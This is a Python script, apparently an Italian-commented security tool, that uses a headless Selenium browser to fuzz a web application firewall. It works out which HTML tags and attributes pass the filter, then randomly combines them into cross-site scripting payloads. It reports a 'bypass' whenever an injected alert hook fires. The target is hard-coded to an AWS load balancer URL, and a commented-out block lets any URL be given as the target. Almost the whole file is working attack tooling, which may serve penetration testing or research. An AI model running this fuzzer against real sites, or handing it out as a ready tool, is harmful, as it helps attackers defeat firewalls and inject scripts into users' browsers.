from urllib.parse import unquote import selenium import time from selenium import webdriver from selenium.webdriver.support.ui import WebDriverWait from urllib.parse import urlparse from urllib.parse import urlencode from tags import Attributes from tags import Tags import random import argparse # WAFBypass class from language import HTMLTag, HTMLAttribute, HTMLTagAttributeType t = HTMLTag("form") i = HTMLTag("input", self_closing=True) i.attributes.append(HTMLAttribute("type", HTMLTagAttributeType.TypeText)) t.children.append(i) print(t) class WAFBypass(): # Script JS per sovrascrivere la funzione alert nativa di JS. code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}" def __init__(self, url) -> None: """ Inizializzazione webdriver e controllo connessione all'URL. """ self.options = webdriver.ChromeOptions() self.options.add_argument('--no-sandbox') self.options.add_argument('--headless') self.driver = webdriver.Chrome(options=self.options) self.url = urlparse(url) # Liste di attributi e tag non filtrati self.unfiltered_attributes = list() self.unfiltered_tags = list() if not self.check_connection(): raise Exception("Connection Error") # Inietta il codice in ogni nuova pagina self.driver.execute_cdp_cmd( "Page.addScriptToEvaluateOnNewDocument", {"source": self.code}) def identify_unfiltered_attributes(self): """ Identifica gli attributi che non sono filtrati dal WAF. """ print("[*] Identifying unfiltered attributes:") try: for attr in Attributes: encoded = urlencode({"param2": f"{attr}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, _ = self.navigate(url) if not is403: print(f" [+] {attr.name}") self.unfiltered_attributes.append(attr) except KeyboardInterrupt: self.driver.close() exit(0) def identify_unfiltered_tags(self): """ Identifica i tag che non sono filtrati dal WAF """ print("[*] Identifying unfiltered tags:") try: for tag_obj in Tags: #TODO aggiungere lista tag tag_str = f"<{tag_obj.name}>" if not tag_obj.self_closing else f"<{tag_obj.name}/>" encoded = urlencode({"param2": tag_str}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, _ = self.navigate(url) if not is403: print(f" [+] {tag_obj.name}") self.unfiltered_tags.append(tag_obj) except KeyboardInterrupt: self.driver.close() exit(0) def check_connection(self): """ Verifica della possibilità di connessione all'URL. """ try: self.driver.get(self.url.geturl()) return True except: return False def wait_for_pageload(self): """ Delay per attendere che la pagina web sia completamente caricata. """ try: WebDriverWait(self.driver, 4).until( lambda driver: driver.execute_script("return document.readyState") == "complete") except TimeoutError: raise Exception("Page Load Error") def get_page_title(self): """ Ritorna il titolo della pagina corrente """ return self.driver.title @property def is_403(self): """ Verifica se la pagina è 403 analizzando il titolo. """ return self.driver.title == "403 Forbidden" @property def triggered_xss(self): """ Verifica se l'XSS è stato eseguito. """ return self.driver.execute_script("return window.alert_trigger") def navigate(self, url): """ Naviga verso un URL specifico e controlla se si verifica un errore 403 o un'esecuzione di XSS. """ self.driver.get(url) self.wait_for_pageload() is403 = False if self.is_403: is403 = True else: is403 = False triggerxss = self.triggered_xss return (is403, triggerxss) def run_fuzz(self): """ Fuzzing solo su attributi non filtrati. """ print("[*] Start fuzzing:") try: for attr in self.unfiltered_attributes: # print(f"[*] Testing {attr.name} attribute {attr}") encoded = urlencode({"param2": f"{attr}"}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" # print(url) _, trigger = self.navigate(url) except KeyboardInterrupt: self.driver.close() exit(0) def run_fuzz2(self, num_iterations=100000): """ Esegue un fuzzing personalizzato utilizzando solo tag e attributi che non sono stati filtrati. """ print("\n[*] Start fuzzing:") try: for _ in range(num_iterations): tag_obj = random.choice(self.unfiltered_tags) attr = random.choice(self.unfiltered_attributes) # Genera numero random di figli (child) e attributi per ciascun figlio num_child = random.randint(5, 10) children = [] for _ in range(num_child): child_tag = random.choice(self.unfiltered_tags) child_attr = random.choice(self.unfiltered_attributes) if child_tag.self_closing: children.append(f"<{child_tag.name} {child_attr}/>") else: children.append(f"<{child_tag.name} {child_attr}>") # Crea la stringa del tag HTML if tag_obj.self_closing: tag_str = f"<{tag_obj.name} {attr}/>" else: child_str = ''.join(children) tag_str = f"<{tag_obj.name} {attr}>{child_str}" # Codifica e invia la richiesta encoded = urlencode({"param2": tag_str}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, triggered = self.navigate(url) if not is403 and triggered: print(f"[*] Bypass found: {tag_str}") # if args.link: print(f" {url}") except KeyboardInterrupt: self.driver.close() exit(0) # Creazione dell'istanza della classe. w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com") # Avvio identificazione di attributi e tag validi w.identify_unfiltered_attributes() w.identify_unfiltered_tags() w.run_fuzz2() ''' if __name__ == '__main__': parser = argparse.ArgumentParser(description="WAF Bypass Fuzzer") parser.add_argument('-u', '--url', required=True, help='Target URL') parser.add_argument('-p', '--param', required=True, help='Target Parameter') parser.add_argument('-i', '--iterations', type=int, help='Number of iterations (default: infinite)') parser.add_argument('-l', '--link', action='store_true', help='Provide full request link') args = parser.parse_args() w = WAFBypass(args.url) if args.iterations: w.run_fuzz2(num_iterations=args.iterations) else: # loop infinito se '-i' non è specificato while True: w.identify_unfiltered_attributes() w.identify_unfiltered_tags() w.run_fuzz2() '''